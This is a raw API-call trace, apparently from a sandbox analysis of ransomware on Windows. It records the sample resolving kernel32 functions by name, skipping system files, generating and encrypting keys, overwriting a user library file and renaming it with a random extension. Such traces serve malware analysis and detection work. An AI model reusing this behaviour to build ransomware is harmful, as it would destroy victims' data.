lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.833] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.833] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.833] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.833] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.833] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.833] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.833] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.833] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.833] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.833] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.833] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.833] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.833] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.833] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.833] lstrlenA (lpString="DELETEATOM") returned 10 [0079.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.834] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.834] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.834] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.834] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.834] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.834] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.834] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.834] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.834] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.834] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.834] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.834] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.834] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.834] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.834] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.834] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.834] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.834] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.834] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.835] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.835] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.835] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.835] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.835] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.835] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.835] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.835] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.835] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.835] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.835] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.835] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.835] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.835] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.835] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.835] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.835] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.835] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.836] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.836] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.836] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.836] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.836] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms") returned 93 [0079.836] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms.sRdsgRd") returned 101 [0079.836] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms.sRdsgRd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms.srdsgrd"), dwFlags=0x0) returned 1 [0079.838] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.838] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.839] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.839] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d207440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms", cAlternateFileName="VIDEOS~1.LIB")) returned 1 [0079.839] lstrcmpiW (lpString1="Videos.library-ms", lpString2="DECRYPT-FILES.txt") returned 1 [0079.839] lstrcmpiW (lpString1="Videos.library-ms", lpString2="autorun.inf") returned 1 [0079.839] lstrcmpiW (lpString1="Videos.library-ms", lpString2="boot.ini") returned 1 [0079.839] lstrcmpiW (lpString1="Videos.library-ms", lpString2="desktop.ini") returned 1 [0079.839] lstrcmpiW (lpString1="Videos.library-ms", lpString2="ntuser.dat") returned 1 [0079.839] lstrcmpiW (lpString1="Videos.library-ms", lpString2="iconcache.db") returned 1 [0079.839] lstrcmpiW (lpString1="Videos.library-ms", lpString2="bootsect.bak") returned 1 [0079.839] lstrcmpiW (lpString1="Videos.library-ms", lpString2="ntuser.dat.log") returned 1 [0079.839] lstrcmpiW (lpString1="Videos.library-ms", lpString2="thumbs.db") returned 1 [0079.839] lstrcmpiW (lpString1="Videos.library-ms", lpString2="Bootfont.bin") returned 1 [0079.839] lstrlenW (lpString="Videos.library-ms") returned 17 [0079.839] lstrcmpiW (lpString1="library-ms", lpString2="lnk") returned -1 [0079.839] lstrcmpiW (lpString1="library-ms", lpString2="exe") returned 1 [0079.839] lstrcmpiW (lpString1="library-ms", lpString2="sys") returned -1 [0079.839] lstrcmpiW (lpString1="library-ms", lpString2="dll") returned 1 [0079.839] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0079.839] lstrlenW (lpString="Videos.library-ms") returned 17 [0079.839] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0079.839] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="Videos.library-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms" [0079.839] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.840] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0079.840] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=3598) returned 1 [0079.840] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0079.840] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.840] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.840] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.840] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.841] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0079.841] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.841] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.841] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.842] CloseHandle (hObject=0x45c) returned 1 [0079.842] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.842] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0079.843] CloseHandle (hObject=0x0) returned 0 [0079.843] CloseHandle (hObject=0x458) returned 1 [0079.844] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.844] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.844] GetTickCount () returned 0x114c736 [0079.844] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.844] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.844] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.845] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.845] lstrlenA (lpString="kernel32.dll") returned 12 [0079.845] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.845] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.845] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.845] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.845] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.845] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.845] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.845] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.845] lstrlenA (lpString="ADDATOMA") returned 8 [0079.845] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.845] lstrlenA (lpString="ADDATOMW") returned 8 [0079.845] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.845] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.845] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.846] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.846] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.846] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.846] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.846] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.846] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.846] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.846] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.846] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.846] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.846] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.846] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.846] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.846] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.846] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.846] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.846] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.846] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.846] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.846] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.847] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.847] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.847] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.847] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.847] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.847] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.847] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.847] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" 